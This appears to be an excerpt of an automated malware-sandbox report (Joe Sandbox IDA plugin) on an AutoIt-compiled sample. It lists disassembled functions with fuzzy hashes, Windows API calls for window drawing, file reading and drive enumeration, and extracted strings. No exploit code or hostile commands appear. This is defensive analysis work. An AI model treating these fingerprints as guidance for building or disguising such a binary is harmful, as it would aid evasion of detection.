Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction ID: 2e7442406410d10b90ae99023f84cb40d72b1cf45a2ec00d4cd01b45524e4982
Opcode Fuzzy Hash: 40101273f58913c3cb3bc7eb54df01d47b4121c3e67d19f11ec2cb23d33ea445
Instruction Fuzzy Hash: 1891577220D0E34EFB2D467A857403DFFE15A923A2B5A479ED4F2CA1C2FD18D564D620

Function 00737A4A Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: dfd0d2c3257da00639d646b22c01c1629f9e3bf052da45c9275d2e636b0d6bd4
Instruction ID: 623a69fd8901438e650cf29196f87b6b738da55f9ad7a3129dbb2d8bdc5558a5
Opcode Fuzzy Hash: dfd0d2c3257da00639d646b22c01c1629f9e3bf052da45c9275d2e636b0d6bd4
Instruction Fuzzy Hash: 2E615CF1208749A6FE7C5A2C8C95BBEA3A8DF41700F14491DF843DB283D61D9E42C366

Function 00737CA7 Relevance: .2, Instructions: 237COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7fd21dba53f14f859ba0de681d46060ed441d4903cf556a69dd17ba3737f8276
Instruction ID: cd8a879b8a2401a0b19c43e13ec49133553584e1da7a1fd6f33f025e24f753f4
Opcode Fuzzy Hash: 7fd21dba53f14f859ba0de681d46060ed441d4903cf556a69dd17ba3737f8276
Instruction Fuzzy Hash: D4616BF1758709A6FE3C5A288896BBF2398DF41700F104959F943DF283D62EAD41C356

Function 00731706 Relevance: .2, Instructions: 232COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction ID: 228bda9c24756fb4c75185dcb6c225ed39b42796dd5b22932373e3461a26a414
Opcode Fuzzy Hash: 70da388f96bbbf26b230a155b4728740b34f0d100ea60ab2bbadb9d7d0befbf0
Instruction Fuzzy Hash: 3A8193726080E309FB2D823A853407EFFE15A923B1B5E079DD4F2CA1C3EE28D554E620

Function 01322E68 Relevance: .1, Instructions: 92COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction ID: 80543ea91ffe9483b24d06eea688bedf3d45a478e69a77667d98ec05d630ca51
Opcode Fuzzy Hash: 424b499c86482d5e2cad33d2eb2b77d7085f14ac4781241b47b3debc7e1ef18c
Instruction Fuzzy Hash: CD41D271D1051CEBCF48CFADC991AEEBBF2AF88201F548299D516AB345D730AB41DB90

Function 01322CF8 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction ID: 80b8e3babe47584d4980bae4e24cbd6d84116fef46bb451b501121761ce598c0
Opcode Fuzzy Hash: 6091d3ab8c142cd01bdaf95ad615aaddba634de501579065cef803e1d5150a63
Instruction Fuzzy Hash: F4019278A00109EFCB48EF98C9909AEF7B5FF48314F608599E819A7741D730AE41DF90

Function 01322D58 Relevance: .0, Instructions: 35COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction ID: 955639ab06dc74622b261b9cd41035abb72010b4502340053ea01ca975bd4710
Opcode Fuzzy Hash: 2824983519b781728331ca74e43d8f1b114060d413125894b627f2317d3cf6f3
Instruction Fuzzy Hash: C701A478A00109EFCB44EF98C9909AEF7F5FF48314F608599E819A7701D730AE41DB80

Function 013216A8 Relevance: .0, Instructions: 6COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2016132862.000000000131F000.00000040.00000020.00020000.00000000.sdmp, Offset: 0131F000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_131f000_9876567899.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction ID: 2052e7d0eb43af8a57a5c2d707c06396f1b84aee57587abda472ed480d51124b
Opcode Fuzzy Hash: e1f80ac41b4fc2d45690e214ca5193b9bf4f67450f61a2a701b7f1fb86cd8f4e
Instruction Fuzzy Hash: 1AB012310527488BC2118B89E008B1073ECA308E04F1000B0D40C07B01827874008D48

Function 00792ADE Relevance: 77.5, APIs: 40, Strings: 4, Instructions: 486filecommemoryCOMMON

Download Yara Rule

APIs

DeleteObject.GDI32(00000000), ref: 00792B30
DeleteObject.GDI32(00000000), ref: 00792B43
DestroyWindow.USER32 ref: 00792B52
GetDesktopWindow.USER32 ref: 00792B6D
GetWindowRect.USER32(00000000), ref: 00792B74
SetRect.USER32(?,00000000,00000000,00000007,00000002), ref: 00792CA3
AdjustWindowRectEx.USER32(?,88C00000,00000000,?), ref: 00792CB1
CreateWindowExW.USER32(?,AutoIt v3,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792CF8
GetClientRect.USER32(00000000,?), ref: 00792D04
CreateWindowExW.USER32(00000000,static,00000000,5000000E,00000000,00000000,?,?,00000000,00000000,00000000), ref: 00792D40
CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D62
GetFileSize.KERNEL32(00000000,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D75
GlobalAlloc.KERNEL32(00000002,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D80
GlobalLock.KERNEL32(00000000), ref: 00792D89
ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792D98
GlobalUnlock.KERNEL32(00000000), ref: 00792DA1
CloseHandle.KERNEL32(00000000,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792DA8
GlobalFree.KERNEL32(00000000), ref: 00792DB3
CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792DC5
OleLoadPicture.OLEAUT32(?,00000000,00000000,007AFC38,00000000), ref: 00792DDB
GlobalFree.KERNEL32(00000000), ref: 00792DEB
CopyImage.USER32(00000007,00000000,00000000,00000000,00002000), ref: 00792E11
SendMessageW.USER32(00000000,00000172,00000000,00000007), ref: 00792E30
SetWindowPos.USER32(00000000,00000000,00000000,00000000,?,?,00000020,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 00792E52
ShowWindow.USER32(00000004,?,88C00000,000000FF,000000FF,?,?,00000000,00000000,00000000), ref: 0079303F

Strings

, xrefs: 00792FC5
AutoIt v3, xrefs: 00792CF2
DISPLAY, xrefs: 00792EA2
static, xrefs: 00792D3A, 00792E91

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Global$CreateRect$File$DeleteFreeObject$AdjustAllocClientCloseCopyDesktopDestroyHandleImageLoadLockMessagePictureReadSendShowSizeStreamUnlock
String ID: $AutoIt v3$DISPLAY$static
API String ID: 2211948467-2373415609
Opcode ID: 02befa9a0c82a01c9c0a75fd745a77be05bf0973dfb9a4d6ba6e3945aba49f63
Instruction ID: c1038f47d585b850984fe188bf91fe37d0f53c34bd38ea7eb998faeea107e17e
Opcode Fuzzy Hash: 02befa9a0c82a01c9c0a75fd745a77be05bf0973dfb9a4d6ba6e3945aba49f63
Instruction Fuzzy Hash: D5027E71600204FFDB15DF64DC89EAE7BB9FB49310F008158F915AB2A1DB38AD01CB64

Function 007A70D5 Relevance: 49.8, APIs: 33, Instructions: 273COMMON

Download Yara Rule

APIs

SetTextColor.GDI32(?,00000000), ref: 007A712F
GetSysColorBrush.USER32(0000000F), ref: 007A7160
GetSysColor.USER32(0000000F), ref: 007A716C
SetBkColor.GDI32(?,000000FF), ref: 007A7186
SelectObject.GDI32(?,?), ref: 007A7195
InflateRect.USER32(?,000000FF,000000FF), ref: 007A71C0
GetSysColor.USER32(00000010), ref: 007A71C8
CreateSolidBrush.GDI32(00000000), ref: 007A71CF
FrameRect.USER32(?,?,00000000), ref: 007A71DE
DeleteObject.GDI32(00000000), ref: 007A71E5
InflateRect.USER32(?,000000FE,000000FE), ref: 007A7230
FillRect.USER32(?,?,?), ref: 007A7262
GetWindowLongW.USER32(?,000000F0), ref: 007A7284

Part of subcall function 007A73E8: GetSysColor.USER32(00000012), ref: 007A7421
Part of subcall function 007A73E8: SetTextColor.GDI32(?,?), ref: 007A7425
Part of subcall function 007A73E8: GetSysColorBrush.USER32(0000000F), ref: 007A743B
Part of subcall function 007A73E8: GetSysColor.USER32(0000000F), ref: 007A7446
Part of subcall function 007A73E8: GetSysColor.USER32(00000011), ref: 007A7463
Part of subcall function 007A73E8: CreatePen.GDI32(00000000,00000001,00743C00), ref: 007A7471
Part of subcall function 007A73E8: SelectObject.GDI32(?,00000000), ref: 007A7482
Part of subcall function 007A73E8: SetBkColor.GDI32(?,00000000), ref: 007A748B
Part of subcall function 007A73E8: SelectObject.GDI32(?,?), ref: 007A7498
Part of subcall function 007A73E8: InflateRect.USER32(?,000000FF,000000FF), ref: 007A74B7
Part of subcall function 007A73E8: RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007A74CE
Part of subcall function 007A73E8: GetWindowLongW.USER32(00000000,000000F0), ref: 007A74DB

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Color$Rect$Object$BrushInflateSelect$CreateLongTextWindow$DeleteFillFrameRoundSolid
String ID:
API String ID: 4124339563-0
Opcode ID: a395ff104cee64a49d269181b177a392ae31cbda0c44f6069866f51614a85bd7
Instruction ID: c1d833a297b8b297f6d1daa8806396e47f3a606c5ba0eede3470e098bae3167b
Opcode Fuzzy Hash: a395ff104cee64a49d269181b177a392ae31cbda0c44f6069866f51614a85bd7
Instruction Fuzzy Hash: 52A19C72508305BFDB069F60DC48A6BBBE9FBCA320F104B19F962961E1D738E944CB51

Function 00728D85 Relevance: 47.7, APIs: 26, Strings: 1, Instructions: 480windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(?,?), ref: 00728E14
SendMessageW.USER32(?,00001308,?,00000000), ref: 00766AC5
ImageList_Remove.COMCTL32(?,000000FF,?), ref: 00766AFE
MoveWindow.USER32(?,?,?,?,?,00000000), ref: 00766F43

Part of subcall function 00728F62: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00728BE8,?,00000000,?,?,?,?,00728BBA,00000000,?), ref: 00728FC5

SendMessageW.USER32(?,00001053), ref: 00766F7F
SendMessageW.USER32(?,00001008,000000FF,00000000), ref: 00766F96
ImageList_Destroy.COMCTL32(00000000,?), ref: 00766FAC
ImageList_Destroy.COMCTL32(00000000,?), ref: 00766FB7

Strings

0, xrefs: 00766DCF

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: DestroyImageList_MessageSend$Window$InvalidateMoveRectRemove
String ID: 0
API String ID: 2760611726-4108050209
Opcode ID: 5cf960e0bc177573c301937f2194a77b082775510c01acbf8398033157868eec
Instruction ID: b391f4e94040ef4cd4d46059eb55ea3ffd03a5bcf3b3695a5811d5d342211faa
Opcode Fuzzy Hash: 5cf960e0bc177573c301937f2194a77b082775510c01acbf8398033157868eec
Instruction Fuzzy Hash: A912C330602251EFDB25CF24D884BA5B7E5FB49300F958469F896CB262CB3AEC51CF55

Function 00792711 Relevance: 45.8, APIs: 22, Strings: 4, Instructions: 330windowCOMMON

Download Yara Rule

APIs

DestroyWindow.USER32(00000000), ref: 0079273E
SystemParametersInfoW.USER32(00000030,00000000,?,00000000), ref: 0079286A
SetRect.USER32(?,00000000,00000000,0000012C,?), ref: 007928A9
AdjustWindowRectEx.USER32(?,88C00000,00000000,00000008), ref: 007928B9
CreateWindowExW.USER32(00000008,AutoIt v3,?,88C00000,000000FF,?,?,?,00000000,00000000,00000000), ref: 00792900
GetClientRect.USER32(00000000,?), ref: 0079290C
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000), ref: 00792955
CreateDCW.GDI32(DISPLAY,00000000,00000000,00000000), ref: 00792964
GetStockObject.GDI32(00000011), ref: 00792974
SelectObject.GDI32(00000000,00000000), ref: 00792978
GetTextFaceW.GDI32(00000000,00000040,?,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?), ref: 00792988
GetDeviceCaps.GDI32(00000000,0000005A), ref: 00792991
DeleteDC.GDI32(00000000), ref: 0079299A
CreateFontW.GDI32(00000000,00000000,00000000,00000000,00000258,00000000,00000000,00000000,00000001,00000004,00000000,00000002,00000000,?), ref: 007929C6
SendMessageW.USER32(00000030,00000000,00000001), ref: 007929DD
CreateWindowExW.USER32(00000200,msctls_progress32,00000000,50000001,?,-0000001D,00000104,00000014,00000000,00000000,00000000), ref: 00792A1D
SendMessageW.USER32(00000000,00000401,00000000,00640000), ref: 00792A31
SendMessageW.USER32(00000404,00000001,00000000), ref: 00792A42
CreateWindowExW.USER32(00000000,static,?,50000000,?,00000041,00000500,-00000027,00000000,00000000,00000000), ref: 00792A77
GetStockObject.GDI32(00000011), ref: 00792A82
SendMessageW.USER32(00000030,00000000,?,50000000), ref: 00792A8D
ShowWindow.USER32(00000004,?,50000000,?,00000004,00000500,-00000017,00000000,00000000,00000000,?,88C00000,000000FF,?,?,?), ref: 00792A97

Strings

AutoIt v3, xrefs: 007928F8
DISPLAY, xrefs: 0079295A
static, xrefs: 0079294F, 00792A71
msctls_progress32, xrefs: 00792A13

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Window$Create$MessageSend$ObjectRect$Stock$AdjustCapsClientDeleteDestroyDeviceFaceFontInfoParametersSelectShowSystemText
String ID: AutoIt v3$DISPLAY$msctls_progress32$static
API String ID: 2910397461-517079104
Opcode ID: ef465bcdc2fd621a0ebc047f127f0758a802ec6c6c2009459480ba0329bfecfc
Instruction ID: 3c85a15974266b009cbf1326dfd01d56ec5e317e21ff6ab51d09c1c6584c2c20
Opcode Fuzzy Hash: ef465bcdc2fd621a0ebc047f127f0758a802ec6c6c2009459480ba0329bfecfc
Instruction Fuzzy Hash: C7B14EB1A00215BFDB14DFA8DC8AEAE7BB9EB49710F008114F915EB291D778AD41CB94

Function 00784ADF Relevance: 45.7, APIs: 3, Strings: 23, Instructions: 191COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000001), ref: 00784AED
GetDriveTypeW.KERNEL32(?,007ACB68,?,\\.\,007ACC08), ref: 00784BCA
SetErrorMode.KERNEL32(00000000,007ACB68,?,\\.\,007ACC08), ref: 00784D36

Strings

PhysicalDrive, xrefs: 00784B76
Fibre, xrefs: 00784CAD
1394, xrefs: 00784C9F
RAID, xrefs: 00784CBB
USB, xrefs: 00784CB4
SATA, xrefs: 00784CD0
Removable, xrefs: 00784C10, 00784C15
\\.\, xrefs: 00784B3F
SSA, xrefs: 00784CA6
ATA, xrefs: 00784C98
Virtual, xrefs: 00784CE5
SSD, xrefs: 00784C4A
FileBackedVirtual, xrefs: 00784CEC
Network, xrefs: 00784C02
ATAPI, xrefs: 00784C91
Unknown, xrefs: 00784BED, 00784C83
SAS, xrefs: 00784CC9
SCSI, xrefs: 00784C8A
MMC, xrefs: 00784CDE
iSCSI, xrefs: 00784CC2
CDROM, xrefs: 00784BFB
Fixed, xrefs: 00784C09
RAMDisk, xrefs: 00784BF4

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: ErrorMode$DriveType
String ID: 1394$ATA$ATAPI$CDROM$Fibre$FileBackedVirtual$Fixed$MMC$Network$PhysicalDrive$RAID$RAMDisk$Removable$SAS$SATA$SCSI$SSA$SSD$USB$Unknown$Virtual$\\.\$iSCSI
API String ID: 2907320926-4222207086
Opcode ID: 3d07c6e4521c5a71e2e408a38c09d184ea8447bb67a4cf6bfa1cfafea795d1be
Instruction ID: cc126940e35461b3c12a4c137c417d5931f29c2df85563d7bbc1eb128b2cf26c
Opcode Fuzzy Hash: 3d07c6e4521c5a71e2e408a38c09d184ea8447bb67a4cf6bfa1cfafea795d1be
Instruction Fuzzy Hash: 7361B370785107EBCB14FF28CA959A8B7F5AB44340B248016F806AB791DBFDED41DB61

Function 007A73E8 Relevance: 39.2, APIs: 26, Instructions: 201windowCOMMON

Download Yara Rule

APIs

GetSysColor.USER32(00000012), ref: 007A7421
SetTextColor.GDI32(?,?), ref: 007A7425
GetSysColorBrush.USER32(0000000F), ref: 007A743B
GetSysColor.USER32(0000000F), ref: 007A7446
CreateSolidBrush.GDI32(?), ref: 007A744B
GetSysColor.USER32(00000011), ref: 007A7463
CreatePen.GDI32(00000000,00000001,00743C00), ref: 007A7471
SelectObject.GDI32(?,00000000), ref: 007A7482
SetBkColor.GDI32(?,00000000), ref: 007A748B
SelectObject.GDI32(?,?), ref: 007A7498
InflateRect.USER32(?,000000FF,000000FF), ref: 007A74B7
RoundRect.GDI32(?,?,?,?,?,00000005,00000005), ref: 007A74CE
GetWindowLongW.USER32(00000000,000000F0), ref: 007A74DB
SendMessageW.USER32(00000000,0000000E,00000000,00000000), ref: 007A752A
GetWindowTextW.USER32(00000000,00000000,00000001), ref: 007A7554
InflateRect.USER32(?,000000FD,000000FD), ref: 007A7572
DrawFocusRect.USER32(?,?), ref: 007A757D
GetSysColor.USER32(00000011), ref: 007A758E
SetTextColor.GDI32(?,00000000), ref: 007A7596
DrawTextW.USER32(?,007A70F5,000000FF,?,00000000), ref: 007A75A8
SelectObject.GDI32(?,?), ref: 007A75BF
DeleteObject.GDI32(?), ref: 007A75CA
SelectObject.GDI32(?,?), ref: 007A75D0
DeleteObject.GDI32(?), ref: 007A75D5
SetTextColor.GDI32(?,?), ref: 007A75DB
SetBkColor.GDI32(?,?), ref: 007A75E5

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: Color$Object$Text$RectSelect$BrushCreateDeleteDrawInflateWindow$FocusLongMessageRoundSendSolid
String ID:
API String ID: 1996641542-0
Opcode ID: 0ff49952e428e7f6b211fe5938957cf3a1275eb9b3d416ddff8a45f7fd7c9978
Instruction ID: d9068959950ecebb2df0f9b7249635de96628bbe75cd9bfcd5189e73a71b16d4
Opcode Fuzzy Hash: 0ff49952e428e7f6b211fe5938957cf3a1275eb9b3d416ddff8a45f7fd7c9978
Instruction Fuzzy Hash: 26616272D00218BFDF059FA4DC49A9E7FB9EB4A320F118125F911A72A1D7789940CB94

Function 007A0FF3 Relevance: 37.0, APIs: 18, Strings: 3, Instructions: 284windowCOMMON

Download Yara Rule

APIs

GetCursorPos.USER32(?), ref: 007A1128
GetDesktopWindow.USER32 ref: 007A113D
GetWindowRect.USER32(00000000), ref: 007A1144
GetWindowLongW.USER32(?,000000F0), ref: 007A1199
DestroyWindow.USER32(?), ref: 007A11B9
CreateWindowExW.USER32(00000008,tooltips_class32,00000000,7FFFFFFD,80000000,80000000,80000000,80000000,00000000,00000000,00000000,00000000), ref: 007A11ED
SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 007A120B
SendMessageW.USER32(00000000,00000418,00000000,?), ref: 007A121D
SendMessageW.USER32(00000000,00000421,?,?), ref: 007A1232
SendMessageW.USER32(00000000,0000041D,00000000,00000000), ref: 007A1245
IsWindowVisible.USER32(00000000), ref: 007A12A1
SendMessageW.USER32(00000000,00000412,00000000,D8F0D8F0), ref: 007A12BC
SendMessageW.USER32(00000000,00000411,00000001,00000030), ref: 007A12D0
GetWindowRect.USER32(00000000,?), ref: 007A12E8
MonitorFromPoint.USER32(?,?,00000002), ref: 007A130E
GetMonitorInfoW.USER32(00000000,?), ref: 007A1328
CopyRect.USER32(?,?), ref: 007A133F
SendMessageW.USER32(00000000,00000412,00000000), ref: 007A13AA

Strings

0, xrefs: 007A10D3
(, xrefs: 007A131B
tooltips_class32, xrefs: 007A11E6

Memory Dump Source

Source File: 00000000.00000002.2015496400.0000000000711000.00000020.00000001.01000000.00000003.sdmp, Offset: 00710000, based on PE: true

Associated: 00000000.00000002.2015409250.0000000000710000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007AC000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015644635.00000000007D2000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015679667.00000000007DC000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.2015693379.00000000007E4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_710000_9876567899.jbxd

Similarity

API ID: MessageSendWindow$Rect$Monitor$CopyCreateCursorDesktopDestroyFromInfoLongPointVisible
String ID: ($0$tooltips_class32
API String ID: 698492251-4156429822
Opcode ID: 6d652756a919b59a4110630ce22425126f06b37f57d111bceccfbb35d96202f2
Instruction ID: 782dc17fbec0acaf029921461ac602e0b5be55932ca5b835e16f62a83bda18f0
Opcode Fuzzy Hash: 6d652756a919b59a4110630ce22425126f06b37f57d111bceccfbb35d96202f2
Instruction Fuzzy Hash: F7B1A071604340EFE714DF64C888B6BBBE4FF89350F408A18F9999B2A1D735D845CB96

Function 007A0241 Relevance: 35.4, APIs: 7, Strings: 13, Instructions: 391windowCOMMON

Download Yara Rule

APIs

CharUpperBuffW.USER32(?,?), ref: 007A02E5
_wcslen.LIBCMT ref: 007A031F
_wcslen.LIBCMT ref: 007A0389
_wcslen.LIBCMT ref: 007A03F1
_wcslen.LIBCMT ref: 007A0475
SendMessageW.USER32(?,00001032,00000000,00000000), ref: 007A04C5
SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 007A0504

Part of subcall function 0072F9F2: _wcslen.LIBCMT ref: 0072F9FD

Part of subcall function 0077223F: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00772258
Part of subcall function 0077223F: SendMessageW.USER32(?,0000102C,00000000,00000002), ref: 0077228A

Strings

VIEWCHANGE, xrefs: 007A0675
GETITEMCOUNT, xrefs: 007A0316, 007A0337
